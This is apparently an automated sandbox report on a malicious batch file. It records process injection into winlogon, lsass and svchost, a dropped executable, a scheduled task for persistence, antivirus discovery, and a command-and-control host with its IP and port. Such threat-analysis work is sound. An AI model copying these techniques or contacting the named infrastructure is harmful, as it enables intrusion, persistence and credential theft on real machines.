Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: winlogon.exe, 00000008.00000002.3562406223.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000008.00000000.2132678069.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000E.00000002.3534775592.00000139F9AB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exeCode function: 8_3_000001E858962AF0 cpuid 8_3_000001E858962AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-gykiBRcP VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$nya-gykiBRcP VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_0000000140002300
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001E858988090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_000001E858988090
Source: dllhost.exeBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts11
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Obfuscated Files or Information
11
Input Capture
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Install Root Certificate
LSASS Memory2
File and Directory Discovery
Remote Desktop Protocol11
Input Capture
1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter
11
Scheduled Task/Job
713
Process Injection
1
Timestomp
Security Account Manager122
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
Login Hook11
Scheduled Task/Job
1
DLL Side-Loading
NTDS241
Security Software Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
Network Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Masquerading
Cached Domain Credentials121
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
Virtualization/Sandbox Evasion
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron713
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Hidden Files and Directories
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1571318 Sample: NhoqAfkhHL.bat Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 88 Malicious sample detected (through community Yara rule) 2->88 90 .NET source code references suspicious native API functions 2->90 92 Found large BAT file 2->92 94 6 other signatures 2->94 10 cmd.exe 1 2->10         started        process3 signatures4 116 Suspicious powershell command line found 10->116 118 Suspicious command line found 10->118 13 powershell.exe 3 30 10->13         started        16 WMIC.exe 1 10->16         started        18 conhost.exe 10->18         started        20 2 other processes 10->20 process5 signatures6 120 Uses schtasks.exe or at.exe to add and modify task schedules 13->120 122 Writes to foreign memory regions 13->122 124 Modifies the context of a thread in another process (thread injection) 13->124 128 2 other signatures 13->128 22 dllhost.exe 1 13->22         started        25 cmd.exe 1 13->25         started        27 cmd.exe 2 13->27         started        126 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 16->126 process7 file8 104 Contains functionality to inject code into remote processes 22->104 106 Writes to foreign memory regions 22->106 108 Creates a thread in another existing process (thread injection) 22->108 114 2 other signatures 22->114 30 winlogon.exe 22->30 injected 32 lsass.exe 22->32 injected 35 svchost.exe 22->35 injected 47 21 other processes 22->47 110 Suspicious powershell command line found 25->110 112 Suspicious command line found 25->112 37 powershell.exe 25->37         started        41 WMIC.exe 1 25->41         started        43 conhost.exe 25->43         started        49 2 other processes 25->49 70 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 27->70 dropped 45 conhost.exe 27->45         started        signatures9 process10 dnsIp11 51 dllhost.exe 30->51         started        76 Installs new ROOT certificates 32->76 54 svchost.exe 32->54 injected 78 System process connects to network (likely due to code injection or exploit) 35->78 72 capacity-sg.gl.at.ply.gg 147.185.221.24, 19465, 49736, 49798 SALSGIVERUS United States 37->72 68 C:\Windows\$nya-onimai2\qVrKPA.exe, PE32+ 37->68 dropped 80 Writes to foreign memory regions 37->80 82 Modifies the context of a thread in another process (thread injection) 37->82 84 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->84 86 2 other signatures 37->86 56 schtasks.exe 37->56         started        74 capacity-sg.gl.at.ply.gg 47->74 file12 signatures13 process14 signatures15 96 Injects code into the Windows Explorer (explorer.exe) 51->96 98 Writes to foreign memory regions 51->98 100 Creates a thread in another existing process (thread injection) 51->100 102 Injects a PE file into a foreign processes 51->102 58 svchost.exe 51->58 injected 60 svchost.exe 51->60 injected 62 svchost.exe 51->62 injected 66 3 other processes 51->66 64 conhost.exe 56->64         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
NhoqAfkhHL.bat0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Windows\$nya-onimai2\qVrKPA.exe100%Joe Sandbox ML
C:\Windows\$nya-onimai2\qVrKPA.exe5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.(0%Avira URL Cloudsafe
http://ocsp.msocsp.0%Avira URL Cloudsafe
http://crl.mi0%Avira URL Cloudsafe
http://3csp.icrosof4m/ocp00%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    capacity-sg.gl.at.ply.gg
    147.185.221.24
    truetrue
      unknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://3csp.icrosof4m/ocp0lsass.exe, 00000009.00000002.3545283451.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.(svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://www.microsoft.copowershell.exe, 0000001C.00000002.3557370304.00000240B2DD6000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.msocsp.lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore6xGpowershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://crl.ver)svchost.exe, 00000014.00000000.2213088609.000001428A88A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601746570.000001428A88A000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://aka.ms/pscore6powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp, Null.6.drfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/pscore68powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.microsvchost.exe, 0000001D.00000002.3545016604.000001A204EE0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.misvchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              147.185.221.24
                                              capacity-sg.gl.at.ply.ggUnited States
                                              12087SALSGIVERUStrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1571318
                                              Start date and time:2024-12-09 09:16:12 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 46s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:20
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:31
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:NhoqAfkhHL.bat
                                              renamed because original name is a hash value
                                              Original Sample Name:c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750.bat
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winBAT@32/25@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 50
                                              • Number of non-executed functions: 345
                                              Cookbook Comments:
                                              • Found application associated with file extension: .bat
                                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • VT rate limit hit for: NhoqAfkhHL.bat
                                              TimeTypeDescription
                                              03:16:59API Interceptor2x Sleep call for process: WMIC.exe modified
                                              03:17:02API Interceptor6014x Sleep call for process: powershell.exe modified
                                              03:17:21API Interceptor37017x Sleep call for process: svchost.exe modified
                                              03:17:43API Interceptor1297146x Sleep call for process: winlogon.exe modified
                                              03:17:44API Interceptor74560x Sleep call for process: lsass.exe modified
                                              03:17:51API Interceptor1142216x Sleep call for process: dwm.exe modified
                                              03:18:05API Interceptor1577x Sleep call for process: spoolsv.exe modified
                                              03:18:07API Interceptor1573x Sleep call for process: cmd.exe modified
                                              03:18:07API Interceptor1371x Sleep call for process: conhost.exe modified
                                              03:18:09API Interceptor114x Sleep call for process: dllhost.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              147.185.221.24a4lIk1Jrla.exeGet hashmaliciousNjrat, RevengeRATBrowse
                                                W6s1vzcRdj.exeGet hashmaliciousXWormBrowse
                                                  u7e3vb5dfk.exeGet hashmaliciousXWormBrowse
                                                    aOi4JyF92S.exeGet hashmaliciousXWormBrowse
                                                      PG4w1WB9dE.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                        a4BE6gJooT.exeGet hashmaliciousXWormBrowse
                                                          grK0Oh8p4Z.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                              msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                6ox7RfKeE3.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  fp2e7a.wpc.phicdn.netSciRTXsDzk.exeGet hashmaliciousUnknownBrowse
                                                                  • 192.229.221.95
                                                                  IobqEI79aH.exeGet hashmaliciousUnknownBrowse
                                                                  • 192.229.221.95
                                                                  Invoice_Payment_Confirmation_INV#240085.PDF.exeGet hashmaliciousUnknownBrowse
                                                                  • 192.229.221.95
                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                  • 192.229.221.95
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 192.229.221.95
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 192.229.221.95
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 192.229.221.95
                                                                  Folder.exeGet hashmaliciousUnknownBrowse
                                                                  • 192.229.221.95
                                                                  file.exeGet hashmaliciousAveMaria, StormKitty, VenomRATBrowse
                                                                  • 192.229.221.95
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                  • 192.229.221.95
                                                                  bg.microsoft.map.fastly.netTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                  • 199.232.210.172
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 199.232.210.172
                                                                  file.exeGet hashmaliciousQuasarBrowse
                                                                  • 199.232.210.172
                                                                  file.exeGet hashmaliciousQuasarBrowse
                                                                  • 199.232.210.172
                                                                  file.exeGet hashmaliciousAveMaria, StormKitty, VenomRATBrowse
                                                                  • 199.232.210.172
                                                                  Q6OOwHYZzH.exeGet hashmaliciousDCRatBrowse
                                                                  • 199.232.210.172
